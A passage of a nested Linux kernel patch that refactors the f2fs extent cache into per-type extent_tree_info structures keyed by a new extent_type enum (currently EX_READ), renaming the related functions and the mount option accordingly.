+ 	f2fs_bug_on(sbi, list_empty(&en->list));
+ 	list_del_init(&en->list);
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 
+ 	__detach_extent_node(sbi, et, en);
+ }
+ 
+-static struct extent_tree *__grab_extent_tree(struct inode *inode)
++static struct extent_tree *__grab_extent_tree(struct inode *inode,
++						enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
+ 	struct extent_tree *et;
+ 	nid_t ino = inode->i_ino;
+ 
+-	mutex_lock(&sbi->extent_tree_lock);
+-	et = radix_tree_lookup(&sbi->extent_tree_root, ino);
++	mutex_lock(&eti->extent_tree_lock);
++	et = radix_tree_lookup(&eti->extent_tree_root, ino);
+ 	if (!et) {
+ 		et = f2fs_kmem_cache_alloc(extent_tree_slab,
+ 					GFP_NOFS, true, NULL);
+-		f2fs_radix_tree_insert(&sbi->extent_tree_root, ino, et);
++		f2fs_radix_tree_insert(&eti->extent_tree_root, ino, et);
+ 		memset(et, 0, sizeof(struct extent_tree));
+ 		et->ino = ino;
++		et->type = type;
+ 		et->root = RB_ROOT_CACHED;
+ 		et->cached_en = NULL;
+ 		rwlock_init(&et->lock);
+ 		INIT_LIST_HEAD(&et->list);
+ 		atomic_set(&et->node_cnt, 0);
+-		atomic_inc(&sbi->total_ext_tree);
++		atomic_inc(&eti->total_ext_tree);
+ 	} else {
+-		atomic_dec(&sbi->total_zombie_tree);
++		atomic_dec(&eti->total_zombie_tree);
+ 		list_del_init(&et->list);
+ 	}
+-	mutex_unlock(&sbi->extent_tree_lock);
++	mutex_unlock(&eti->extent_tree_lock);
+ 
+ 	/* never died until evict_inode */
+-	F2FS_I(inode)->extent_tree = et;
++	F2FS_I(inode)->extent_tree[type] = et;
+ 
+ 	return et;
+ }
+ 
+-static struct extent_node *__init_extent_tree(struct f2fs_sb_info *sbi,
+-				struct extent_tree *et, struct extent_info *ei)
+-{
+-	struct rb_node **p = &et->root.rb_root.rb_node;
+-	struct extent_node *en;
+-
+-	en = __attach_extent_node(sbi, et, ei, NULL, p, true);
+-	if (!en)
+-		return NULL;
+-
+-	et->largest = en->ei;
+-	et->cached_en = en;
+-	return en;
+-}
+-
+ static unsigned int __free_extent_tree(struct f2fs_sb_info *sbi,
+ 					struct extent_tree *et)
+ {
+@@ -358,71 +433,78 @@ static void __drop_largest_extent(struct extent_tree *et,
+ 	}
+ }
+ 
+-/* return true, if inode page is changed */
+-static void __f2fs_init_extent_tree(struct inode *inode, struct page *ipage)
++void f2fs_init_read_extent_tree(struct inode *inode, struct page *ipage)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct f2fs_extent *i_ext = ipage ? &F2FS_INODE(ipage)->i_ext : NULL;
++	struct extent_tree_info *eti = &sbi->extent_tree[EX_READ];
++	struct f2fs_extent *i_ext = &F2FS_INODE(ipage)->i_ext;
+ 	struct extent_tree *et;
+ 	struct extent_node *en;
+ 	struct extent_info ei;
+ 
+-	if (!f2fs_may_extent_tree(inode)) {
+-		/* drop largest extent */
++	if (!__may_extent_tree(inode, EX_READ)) {
++		/* drop largest read extent */
+ 		if (i_ext && i_ext->len) {
+ 			f2fs_wait_on_page_writeback(ipage, NODE, true, true);
+ 			i_ext->len = 0;
+ 			set_page_dirty(ipage);
+-			return;
+ 		}
+-		return;
++		goto out;
+ 	}
+ 
+-	et = __grab_extent_tree(inode);
++	et = __grab_extent_tree(inode, EX_READ);
+ 
+ 	if (!i_ext || !i_ext->len)
+-		return;
++		goto out;
+ 
+-	get_extent_info(&ei, i_ext);
++	get_read_extent_info(&ei, i_ext);
+ 
+ 	write_lock(&et->lock);
+ 	if (atomic_read(&et->node_cnt))
+-		goto out;
++		goto unlock_out;
+ 
+-	en = __init_extent_tree(sbi, et, &ei);
++	en = __attach_extent_node(sbi, et, &ei, NULL,
++				&et->root.rb_root.rb_node, true);
+ 	if (en) {
+-		spin_lock(&sbi->extent_lock);
+-		list_add_tail(&en->list, &sbi->extent_list);
+-		spin_unlock(&sbi->extent_lock);
++		et->largest = en->ei;
++		et->cached_en = en;
++
++		spin_lock(&eti->extent_lock);
++		list_add_tail(&en->list, &eti->extent_list);
++		spin_unlock(&eti->extent_lock);
+ 	}
+-out:
++unlock_out:
+ 	write_unlock(&et->lock);
++out:
++	if (!F2FS_I(inode)->extent_tree[EX_READ])
++		set_inode_flag(inode, FI_NO_EXTENT);
+ }
+ 
+-void f2fs_init_extent_tree(struct inode *inode, struct page *ipage)
++void f2fs_init_extent_tree(struct inode *inode)
+ {
+-	__f2fs_init_extent_tree(inode, ipage);
+-
+-	if (!F2FS_I(inode)->extent_tree)
+-		set_inode_flag(inode, FI_NO_EXTENT);
++	/* initialize read cache */
++	if (__init_may_extent_tree(inode, EX_READ))
++		__grab_extent_tree(inode, EX_READ);
+ }
+ 
+-static bool f2fs_lookup_extent_tree(struct inode *inode, pgoff_t pgofs,
+-							struct extent_info *ei)
++static bool __lookup_extent_tree(struct inode *inode, pgoff_t pgofs,
++			struct extent_info *ei, enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	struct extent_node *en;
+ 	bool ret = false;
+ 
+ 	if (!et)
+ 		return false;
+ 
+-	trace_f2fs_lookup_extent_tree_start(inode, pgofs);
++	trace_f2fs_lookup_extent_tree_start(inode, pgofs, type);
+ 
+ 	read_lock(&et->lock);
+ 
+-	if (et->largest.fofs <= pgofs &&
++	if (type == EX_READ &&
++			et->largest.fofs <= pgofs &&
+ 			et->largest.fofs + et->largest.len > pgofs) {
+ 		*ei = et->largest;
+ 		ret = true;
+@@ -436,23 +518,24 @@ static bool f2fs_lookup_extent_tree(struct inode *inode, pgoff_t pgofs,
+ 		goto out;
+ 
+ 	if (en == et->cached_en)
+-		stat_inc_cached_node_hit(sbi);
++		stat_inc_cached_node_hit(sbi, type);
+ 	else
+-		stat_inc_rbtree_node_hit(sbi);
++		stat_inc_rbtree_node_hit(sbi, type);
+ 
+ 	*ei = en->ei;
+-	spin_lock(&sbi->extent_lock);
++	spin_lock(&eti->extent_lock);
+ 	if (!list_empty(&en->list)) {
+-		list_move_tail(&en->list, &sbi->extent_list);
++		list_move_tail(&en->list, &eti->extent_list);
+ 		et->cached_en = en;
+ 	}
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 	ret = true;
+ out:
+-	stat_inc_total_hit(sbi);
++	stat_inc_total_hit(sbi, type);
+ 	read_unlock(&et->lock);
+ 
+-	trace_f2fs_lookup_extent_tree_end(inode, pgofs, ei);
++	if (type == EX_READ)
++		trace_f2fs_lookup_read_extent_tree_end(inode, pgofs, ei);
+ 	return ret;
+ }
+ 
+@@ -461,18 +544,20 @@ static struct extent_node *__try_merge_extent_node(struct f2fs_sb_info *sbi,
+ 				struct extent_node *prev_ex,
+ 				struct extent_node *next_ex)
+ {
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
+ 	struct extent_node *en = NULL;
+ 
+-	if (prev_ex && __is_back_mergeable(ei, &prev_ex->ei)) {
++	if (prev_ex && __is_back_mergeable(ei, &prev_ex->ei, et->type)) {
+ 		prev_ex->ei.len += ei->len;
+ 		ei = &prev_ex->ei;
+ 		en = prev_ex;
+ 	}
+ 
+-	if (next_ex && __is_front_mergeable(ei, &next_ex->ei)) {
++	if (next_ex && __is_front_mergeable(ei, &next_ex->ei, et->type)) {
+ 		next_ex->ei.fofs = ei->fofs;
+-		next_ex->ei.blk = ei->blk;
+ 		next_ex->ei.len += ei->len;
++		if (et->type == EX_READ)
++			next_ex->ei.blk = ei->blk;
+ 		if (en)
+ 			__release_extent_node(sbi, et, prev_ex);
+ 
+@@ -484,12 +569,12 @@ static struct extent_node *__try_merge_extent_node(struct f2fs_sb_info *sbi,
+ 
+ 	__try_update_largest_extent(et, en);
+ 
+-	spin_lock(&sbi->extent_lock);
++	spin_lock(&eti->extent_lock);
+ 	if (!list_empty(&en->list)) {
+-		list_move_tail(&en->list, &sbi->extent_list);
++		list_move_tail(&en->list, &eti->extent_list);
+ 		et->cached_en = en;
+ 	}
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 	return en;
+ }
+ 
+@@ -499,6 +584,7 @@ static struct extent_node *__insert_extent_tree(struct f2fs_sb_info *sbi,
+ 				struct rb_node *insert_parent,
+ 				bool leftmost)
+ {
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
+ 	struct rb_node **p;
+ 	struct rb_node *parent = NULL;
+ 	struct extent_node *en = NULL;
+@@ -521,47 +607,50 @@ do_insert:
+ 	__try_update_largest_extent(et, en);
+ 
+ 	/* update in global extent list */
+-	spin_lock(&sbi->extent_lock);
+-	list_add_tail(&en->list, &sbi->extent_list);
++	spin_lock(&eti->extent_lock);
++	list_add_tail(&en->list, &eti->extent_list);
+ 	et->cached_en = en;
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 	return en;
+ }
+ 
+-static void f2fs_update_extent_tree_range(struct inode *inode,
+-				pgoff_t fofs, block_t blkaddr, unsigned int len)
++static void __update_extent_tree_range(struct inode *inode,
++			struct extent_info *tei, enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	struct extent_node *en = NULL, *en1 = NULL;
+ 	struct extent_node *prev_en = NULL, *next_en = NULL;
+ 	struct extent_info ei, dei, prev;
+ 	struct rb_node **insert_p = NULL, *insert_parent = NULL;
++	unsigned int fofs = tei->fofs, len = tei->len;
+ 	unsigned int end = fofs + len;
+-	unsigned int pos = (unsigned int)fofs;
+ 	bool updated = false;
+ 	bool leftmost = false;
+ 
+ 	if (!et)
+ 		return;
+ 
+-	trace_f2fs_update_extent_tree_range(inode, fofs, blkaddr, len, 0);
+-
++	if (type == EX_READ)
++		trace_f2fs_update_read_extent_tree_range(inode, fofs, len,
++						tei->blk, 0);
+ 	write_lock(&et->lock);
+ 
+-	if (is_inode_flag_set(inode, FI_NO_EXTENT)) {
+-		write_unlock(&et->lock);
+-		return;
+-	}
++	if (type == EX_READ) {
++		if (is_inode_flag_set(inode, FI_NO_EXTENT)) {
++			write_unlock(&et->lock);
++			return;
++		}
+ 
+-	prev = et->largest;
+-	dei.len = 0;
++		prev = et->largest;
++		dei.len = 0;
+ 
+-	/*
+-	 * drop largest extent before lookup, in case it's already
+-	 * been shrunk from extent tree
+-	 */
+-	__drop_largest_extent(et, fofs, len);
++		/*
++		 * drop largest extent before lookup, in case it's already
++		 * been shrunk from extent tree
++		 */
++		__drop_largest_extent(et, fofs, len);
++	}
+ 
+ 	/* 1. lookup first extent node in range [fofs, fofs + len - 1] */
+ 	en = (struct extent_node *)f2fs_lookup_rb_tree_ret(&et->root,
+@@ -582,26 +671,30 @@ static void f2fs_update_extent_tree_range(struct inode *inode,
+ 
+ 		dei = en->ei;
+ 		org_end = dei.fofs + dei.len;
+-		f2fs_bug_on(sbi, pos >= org_end);
++		f2fs_bug_on(sbi, fofs >= org_end);
+ 
+-		if (pos > dei.fofs && pos - dei.fofs >= F2FS_MIN_EXTENT_LEN) {
+-			en->ei.len = pos - en->ei.fofs;
++		if (fofs > dei.fofs && (type != EX_READ ||
++				fofs - dei.fofs >= F2FS_MIN_EXTENT_LEN)) {
++			en->ei.len = fofs - en->ei.fofs;
+ 			prev_en = en;
+ 			parts = 1;
+ 		}
+ 
+-		if (end < org_end && org_end - end >= F2FS_MIN_EXTENT_LEN) {
++		if (end < org_end && (type != EX_READ ||
++				org_end - end >= F2FS_MIN_EXTENT_LEN)) {
+ 			if (parts) {
+-				set_extent_info(&ei, end,
+-						end - dei.fofs + dei.blk,
+-						org_end - end);
++				__set_extent_info(&ei,
++					end, org_end - end,
++					end - dei.fofs + dei.blk, false,
++					type);
+ 				en1 = __insert_extent_tree(sbi, et, &ei,
+ 							NULL, NULL, true);
+ 				next_en = en1;
+ 			} else {
+-				en->ei.fofs = end;
+-				en->ei.blk += end - dei.fofs;
+-				en->ei.len -= end - dei.fofs;
++				__set_extent_info(&en->ei,
++					end, en->ei.len - (end - dei.fofs),
++					en->ei.blk + (end - dei.fofs), true,
++					type);
+ 				next_en = en;
+ 			}
+ 			parts++;
+@@ -631,10 +724,11 @@ static void f2fs_update_extent_tree_range(struct inode *inode,
+ 		en = next_en;
+ 	}
+ 
+-	/* 3. update extent in extent cache */
+-	if (blkaddr) {
++	/* 3. update extent in read extent cache */
++	BUG_ON(type != EX_READ);
+ 
+-		set_extent_info(&ei, fofs, blkaddr, len);
++	if (tei->blk) {
++		__set_extent_info(&ei, fofs, len, tei->blk, false, EX_READ);
+ 		if (!__try_merge_extent_node(sbi, et, &ei, prev_en, next_en))
+ 			__insert_extent_tree(sbi, et, &ei,
+ 					insert_p, insert_parent, leftmost);
+@@ -664,19 +758,20 @@ static void f2fs_update_extent_tree_range(struct inode *inode,
+ }
+ 
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+-void f2fs_update_extent_tree_range_compressed(struct inode *inode,
++void f2fs_update_read_extent_tree_range_compressed(struct inode *inode,
+ 				pgoff_t fofs, block_t blkaddr, unsigned int llen,
+ 				unsigned int c_len)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[EX_READ];
+ 	struct extent_node *en = NULL;
+ 	struct extent_node *prev_en = NULL, *next_en = NULL;
+ 	struct extent_info ei;
+ 	struct rb_node **insert_p = NULL, *insert_parent = NULL;
+ 	bool leftmost = false;
+ 
+-	trace_f2fs_update_extent_tree_range(inode, fofs, blkaddr, llen, c_len);
++	trace_f2fs_update_read_extent_tree_range(inode, fofs, llen,
++						blkaddr, c_len);
+ 
+ 	/* it is safe here to check FI_NO_EXTENT w/o et->lock in ro image */
+ 	if (is_inode_flag_set(inode, FI_NO_EXTENT))
+@@ -693,7 +788,7 @@ void f2fs_update_extent_tree_range_compressed(struct inode *inode,
+ 	if (en)
+ 		goto unlock_out;
+ 
+-	set_extent_info(&ei, fofs, blkaddr, llen);
++	__set_extent_info(&ei, fofs, llen, blkaddr, true, EX_READ);
+ 	ei.c_len = c_len;
+ 
+ 	if (!__try_merge_extent_node(sbi, et, &ei, prev_en, next_en))
+@@ -704,24 +799,43 @@ unlock_out:
+ }
+ #endif
+ 
+-unsigned int f2fs_shrink_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink)
++static void __update_extent_cache(struct dnode_of_data *dn, enum extent_type type)
+ {
++	struct extent_info ei;
++
++	if (!__may_extent_tree(dn->inode, type))
++		return;
++
++	ei.fofs = f2fs_start_bidx_of_node(ofs_of_node(dn->node_page), dn->inode) +
++								dn->ofs_in_node;
++	ei.len = 1;
++
++	if (type == EX_READ) {
++		if (dn->data_blkaddr == NEW_ADDR)
++			ei.blk = NULL_ADDR;
++		else
++			ei.blk = dn->data_blkaddr;
++	}
++	__update_extent_tree_range(dn->inode, &ei, type);
++}
++
++static unsigned int __shrink_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink,
++					enum extent_type type)
++{
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
+ 	struct extent_tree *et, *next;
+ 	struct extent_node *en;
+ 	unsigned int node_cnt = 0, tree_cnt = 0;
+ 	int remained;
+ 
+-	if (!test_opt(sbi, EXTENT_CACHE))
+-		return 0;
+-
+-	if (!atomic_read(&sbi->total_zombie_tree))
++	if (!atomic_read(&eti->total_zombie_tree))
+ 		goto free_node;
+ 
+-	if (!mutex_trylock(&sbi->extent_tree_lock))
++	if (!mutex_trylock(&eti->extent_tree_lock))
+ 		goto out;
+ 
+ 	/* 1. remove unreferenced extent tree */
+-	list_for_each_entry_safe(et, next, &sbi->zombie_list, list) {
++	list_for_each_entry_safe(et, next, &eti->zombie_list, list) {
+ 		if (atomic_read(&et->node_cnt)) {
+ 			write_lock(&et->lock);
+ 			node_cnt += __free_extent_tree(sbi, et);
+@@ -729,61 +843,100 @@ unsigned int f2fs_shrink_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink)
+ 		}
+ 		f2fs_bug_on(sbi, atomic_read(&et->node_cnt));
+ 		list_del_init(&et->list);
+-		radix_tree_delete(&sbi->extent_tree_root, et->ino);
++		radix_tree_delete(&eti->extent_tree_root, et->ino);
+ 		kmem_cache_free(extent_tree_slab, et);
+-		atomic_dec(&sbi->total_ext_tree);
+-		atomic_dec(&sbi->total_zombie_tree);
++		atomic_dec(&eti->total_ext_tree);
++		atomic_dec(&eti->total_zombie_tree);
+ 		tree_cnt++;
+ 
+ 		if (node_cnt + tree_cnt >= nr_shrink)
+ 			goto unlock_out;
+ 		cond_resched();
+ 	}
+-	mutex_unlock(&sbi->extent_tree_lock);
++	mutex_unlock(&eti->extent_tree_lock);
+ 
+ free_node:
+ 	/* 2. remove LRU extent entries */
+-	if (!mutex_trylock(&sbi->extent_tree_lock))
++	if (!mutex_trylock(&eti->extent_tree_lock))
+ 		goto out;
+ 
+ 	remained = nr_shrink - (node_cnt + tree_cnt);
+ 
+-	spin_lock(&sbi->extent_lock);
++	spin_lock(&eti->extent_lock);
+ 	for (; remained > 0; remained--) {
+-		if (list_empty(&sbi->extent_list))
++		if (list_empty(&eti->extent_list))
+ 			break;
+-		en = list_first_entry(&sbi->extent_list,
++		en = list_first_entry(&eti->extent_list,
+ 					struct extent_node, list);
+ 		et = en->et;
+ 		if (!write_trylock(&et->lock)) {
+ 			/* refresh this extent node's position in extent list */
+-			list_move_tail(&en->list, &sbi->extent_list);
++			list_move_tail(&en->list, &eti->extent_list);
+ 			continue;
+ 		}
+ 
+ 		list_del_init(&en->list);
+-		spin_unlock(&sbi->extent_lock);
++		spin_unlock(&eti->extent_lock);
+ 
+ 		__detach_extent_node(sbi, et, en);
+ 
+ 		write_unlock(&et->lock);
+ 		node_cnt++;
+-		spin_lock(&sbi->extent_lock);
++		spin_lock(&eti->extent_lock);
+ 	}
+-	spin_unlock(&sbi->extent_lock);
++	spin_unlock(&eti->extent_lock);
+ 
+ unlock_out:
+-	mutex_unlock(&sbi->extent_tree_lock);
++	mutex_unlock(&eti->extent_tree_lock);
+ out:
+-	trace_f2fs_shrink_extent_tree(sbi, node_cnt, tree_cnt);
++	trace_f2fs_shrink_extent_tree(sbi, node_cnt, tree_cnt, type);
+ 
+ 	return node_cnt + tree_cnt;
+ }
+ 
+-unsigned int f2fs_destroy_extent_node(struct inode *inode)
++/* read extent cache operations */
++bool f2fs_lookup_read_extent_cache(struct inode *inode, pgoff_t pgofs,
++				struct extent_info *ei)
++{
++	if (!__may_extent_tree(inode, EX_READ))
++		return false;
++
++	return __lookup_extent_tree(inode, pgofs, ei, EX_READ);
++}
++
++void f2fs_update_read_extent_cache(struct dnode_of_data *dn)
++{
++	return __update_extent_cache(dn, EX_READ);
++}
++
++void f2fs_update_read_extent_cache_range(struct dnode_of_data *dn,
++				pgoff_t fofs, block_t blkaddr, unsigned int len)
++{
++	struct extent_info ei = {
++		.fofs = fofs,
++		.len = len,
++		.blk = blkaddr,
++	};
++
++	if (!__may_extent_tree(dn->inode, EX_READ))
++		return;
++
++	__update_extent_tree_range(dn->inode, &ei, EX_READ);
++}
++
++unsigned int f2fs_shrink_read_extent_tree(struct f2fs_sb_info *sbi, int nr_shrink)
++{
++	if (!test_opt(sbi, READ_EXTENT_CACHE))
++		return 0;
++
++	return __shrink_extent_tree(sbi, nr_shrink, EX_READ);
++}
++
++static unsigned int __destroy_extent_node(struct inode *inode,
++					enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	unsigned int node_cnt = 0;
+ 
+ 	if (!et || !atomic_read(&et->node_cnt))
+@@ -796,31 +949,44 @@ unsigned int f2fs_destroy_extent_node(struct inode *inode)
+ 	return node_cnt;
+ }
+ 
+-void f2fs_drop_extent_tree(struct inode *inode)
++void f2fs_destroy_extent_node(struct inode *inode)
++{
++	__destroy_extent_node(inode, EX_READ);
++}
++
++static void __drop_extent_tree(struct inode *inode, enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	bool updated = false;
+ 
+-	if (!f2fs_may_extent_tree(inode))
++	if (!__may_extent_tree(inode, type))
+ 		return;
+ 
+ 	write_lock(&et->lock);
+-	set_inode_flag(inode, FI_NO_EXTENT);
+ 	__free_extent_tree(sbi, et);
+-	if (et->largest.len) {
+-		et->largest.len = 0;
+-		updated = true;
++	if (type == EX_READ) {
++		set_inode_flag(inode, FI_NO_EXTENT);
++		if (et->largest.len) {
++			et->largest.len = 0;
++			updated = true;
++		}
+ 	}
+ 	write_unlock(&et->lock);
+ 	if (updated)
+ 		f2fs_mark_inode_dirty_sync(inode, true);
+ }
+ 
+-void f2fs_destroy_extent_tree(struct inode *inode)
++void f2fs_drop_extent_tree(struct inode *inode)
++{
++	__drop_extent_tree(inode, EX_READ);
++}
++
++static void __destroy_extent_tree(struct inode *inode, enum extent_type type)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	struct extent_tree *et = F2FS_I(inode)->extent_tree;
++	struct extent_tree_info *eti = &sbi->extent_tree[type];
++	struct extent_tree *et = F2FS_I(inode)->extent_tree[type];
+ 	unsigned int node_cnt = 0;
+ 
+ 	if (!et)
+@@ -828,76 +994,49 @@ void f2fs_destroy_extent_tree(struct inode *inode)
+ 
+ 	if (inode->i_nlink && !is_bad_inode(inode) &&
+ 					atomic_read(&et->node_cnt)) {
+-		mutex_lock(&sbi->extent_tree_lock);
+-		list_add_tail(&et->list, &sbi->zombie_list);
+-		atomic_inc(&sbi->total_zombie_tree);
+-		mutex_unlock(&sbi->extent_tree_lock);
++		mutex_lock(&eti->extent_tree_lock);
++		list_add_tail(&et->list, &eti->zombie_list);
++		atomic_inc(&eti->total_zombie_tree);
++		mutex_unlock(&eti->extent_tree_lock);
+ 		return;
+ 	}
+ 
+ 	/* free all extent info belong to this extent tree */
+-	node_cnt = f2fs_destroy_extent_node(inode);
++	node_cnt = __destroy_extent_node(inode, type);
+ 
+ 	/* delete extent tree entry in radix tree */
+-	mutex_lock(&sbi->extent_tree_lock);
++	mutex_lock(&eti->extent_tree_lock);
+ 	f2fs_bug_on(sbi, atomic_read(&et->node_cnt));
+-	radix_tree_delete(&sbi->extent_tree_root, inode->i_ino);
++	radix_tree_delete(&eti->extent_tree_root, inode->i_ino);
+ 	kmem_cache_free(extent_tree_slab, et);
+-	atomic_dec(&sbi->total_ext_tree);
+-	mutex_unlock(&sbi->extent_tree_lock);
++	atomic_dec(&eti->total_ext_tree);
++	mutex_unlock(&eti->extent_tree_lock);
+ 
+-	F2FS_I(inode)->extent_tree = NULL;
+-
+-	trace_f2fs_destroy_extent_tree(inode, node_cnt);
+-}
+-
+-bool f2fs_lookup_extent_cache(struct inode *inode, pgoff_t pgofs,
+-					struct extent_info *ei)
+-{
+-	if (!f2fs_may_extent_tree(inode))
+-		return false;
++	F2FS_I(inode)->extent_tree[type] = NULL;
+ 
+-	return f2fs_lookup_extent_tree(inode, pgofs, ei);
++	trace_f2fs_destroy_extent_tree(inode, node_cnt, type);
+ }
+ 
+-void f2fs_update_extent_cache(struct dnode_of_data *dn)
++void f2fs_destroy_extent_tree(struct inode *inode)
+ {
+-	pgoff_t fofs;
+-	block_t blkaddr;
+-
+-	if (!f2fs_may_extent_tree(dn->inode))
+-		return;
+-
+-	if (dn->data_blkaddr == NEW_ADDR)
+-		blkaddr = NULL_ADDR;
+-	else
+-		blkaddr = dn->data_blkaddr;
+-
+-	fofs = f2fs_start_bidx_of_node(ofs_of_node(dn->node_page), dn->inode) +
+-								dn->ofs_in_node;
+-	f2fs_update_extent_tree_range(dn->inode, fofs, blkaddr, 1);
++	__destroy_extent_tree(inode, EX_READ);
+ }
+ 
+-void f2fs_update_extent_cache_range(struct dnode_of_data *dn,
+-				pgoff_t fofs, block_t blkaddr, unsigned int len)
+-
++static void __init_extent_tree_info(struct extent_tree_info *eti)
+ {
+-	if (!f2fs_may_extent_tree(dn->inode))
+-		return;
+-
+-	f2fs_update_extent_tree_range(dn->inode, fofs, blkaddr, len);
++	INIT_RADIX_TREE(&eti->extent_tree_root, GFP_NOIO);
++	mutex_init(&eti->extent_tree_lock);
++	INIT_LIST_HEAD(&eti->extent_list);
++	spin_lock_init(&eti->extent_lock);
++	atomic_set(&eti->total_ext_tree, 0);
++	INIT_LIST_HEAD(&eti->zombie_list);
++	atomic_set(&eti->total_zombie_tree, 0);
++	atomic_set(&eti->total_ext_node, 0);
+ }
+ 
+ void f2fs_init_extent_cache_info(struct f2fs_sb_info *sbi)
+ {
+-	INIT_RADIX_TREE(&sbi->extent_tree_root, GFP_NOIO);
+-	mutex_init(&sbi->extent_tree_lock);
+-	INIT_LIST_HEAD(&sbi->extent_list);
+-	spin_lock_init(&sbi->extent_lock);
+-	atomic_set(&sbi->total_ext_tree, 0);
+-	INIT_LIST_HEAD(&sbi->zombie_list);
+-	atomic_set(&sbi->total_zombie_tree, 0);
+-	atomic_set(&sbi->total_ext_node, 0);
++	__init_extent_tree_info(&sbi->extent_tree[EX_READ]);
+ }
+ 
+ int __init f2fs_create_extent_cache(void)
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 4b44ca1decdd3..a0a232551da97 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -91,7 +91,7 @@ extern const char *f2fs_fault_name[FAULT_MAX];
+ #define F2FS_MOUNT_FLUSH_MERGE		0x00000400
+ #define F2FS_MOUNT_NOBARRIER		0x00000800
+ #define F2FS_MOUNT_FASTBOOT		0x00001000
+-#define F2FS_MOUNT_EXTENT_CACHE		0x00002000
++#define F2FS_MOUNT_READ_EXTENT_CACHE	0x00002000
+ #define F2FS_MOUNT_DATA_FLUSH		0x00008000
+ #define F2FS_MOUNT_FAULT_INJECTION	0x00010000
+ #define F2FS_MOUNT_USRQUOTA		0x00080000
+@@ -593,35 +593,43 @@ enum {
+ /* dirty segments threshold for triggering CP */
+ #define DEFAULT_DIRTY_THRESHOLD		4
+ 
++#define RECOVERY_MAX_RA_BLOCKS		BIO_MAX_VECS
++#define RECOVERY_MIN_RA_BLOCKS		1
++
++#define F2FS_ONSTACK_PAGES	16	/* nr of onstack pages */
++
+ /* for in-memory extent cache entry */
+ #define F2FS_MIN_EXTENT_LEN	64	/* minimum extent length */
+ 
+ /* number of extent info in extent cache we try to shrink */
+-#define EXTENT_CACHE_SHRINK_NUMBER	128
++#define READ_EXTENT_CACHE_SHRINK_NUMBER	128
+ 
+-#define RECOVERY_MAX_RA_BLOCKS		BIO_MAX_VECS
+-#define RECOVERY_MIN_RA_BLOCKS		1
+-
+-#define F2FS_ONSTACK_PAGES	16	/* nr of onstack pages */
++/* extent cache type */
++enum extent_type {
++	EX_READ,
++	NR_EXTENT_CACHES,
++};
+ 
+ struct rb_entry {
+ 	struct rb_node rb_node;		/* rb node located in rb-tree */
+-	union {
+-		struct {
+-			unsigned int ofs;	/* start offset of the entry */
+-			unsigned int len;	/* length of the entry */
+-		};
+-		unsigned long long key;		/* 64-bits key */
+-	} __packed;
++	unsigned int ofs;		/* start offset of the entry */
++	unsigned int len;		/* length of the entry */
+ };
+ 
+ struct extent_info {
+ 	unsigned int fofs;		/* start offset in a file */
+ 	unsigned int len;		/* length of the extent */
+-	u32 blk;			/* start block address of the extent */
++	union {
++		/* read extent_cache */
++		struct {
++			/* start block address of the extent */
++			block_t blk;
+ #ifdef CONFIG_F2FS_FS_COMPRESSION
+-	unsigned int c_len;		/* physical extent length of compressed blocks */
++			/* physical extent length of compressed blocks */
++			unsigned int c_len;
+ #endif
++		};
++	};
+ };
+ 
+ struct extent_node {
+@@ -633,13 +641,25 @@ struct extent_node {
+ 
+ struct extent_tree {
+ 	nid_t ino;			/* inode number */
++	enum extent_type type;		/* keep the extent tree type */
+ 	struct rb_root_cached root;	/* root of extent info rb-tree */
+ 	struct extent_node *cached_en;	/* recently accessed extent node */
+-	struct extent_info largest;	/* largested extent info */
+ 	struct list_head list;		/* to be used by sbi->zombie_list */
+ 	rwlock_t lock;			/* protect extent info rb-tree */
+ 	atomic_t node_cnt;		/* # of extent node in rb-tree*/
+ 	bool largest_updated;		/* largest extent updated */
++	struct extent_info largest;	/* largest cached extent for EX_READ */
++};
++
++struct extent_tree_info {
++	struct radix_tree_root extent_tree_root;/* cache extent cache entries */
++	struct mutex extent_tree_lock;	/* locking extent radix tree */
++	struct list_head extent_list;		/* lru list for shrinker */
++	spinlock_t extent_lock;			/* locking extent lru list */
++	atomic_t total_ext_tree;		/* extent tree count */
++	struct list_head zombie_list;		/* extent zombie tree list */
++	atomic_t total_zombie_tree;		/* extent zombie tree count */
++	atomic_t total_ext_node;		/* extent info count */
+ };
+ 
+ /*
+@@ -801,7 +821,8 @@ struct f2fs_inode_info {
+ 	struct list_head dirty_list;	/* dirty list for dirs and files */
+ 	struct list_head gdirty_list;	/* linked in global dirty list */
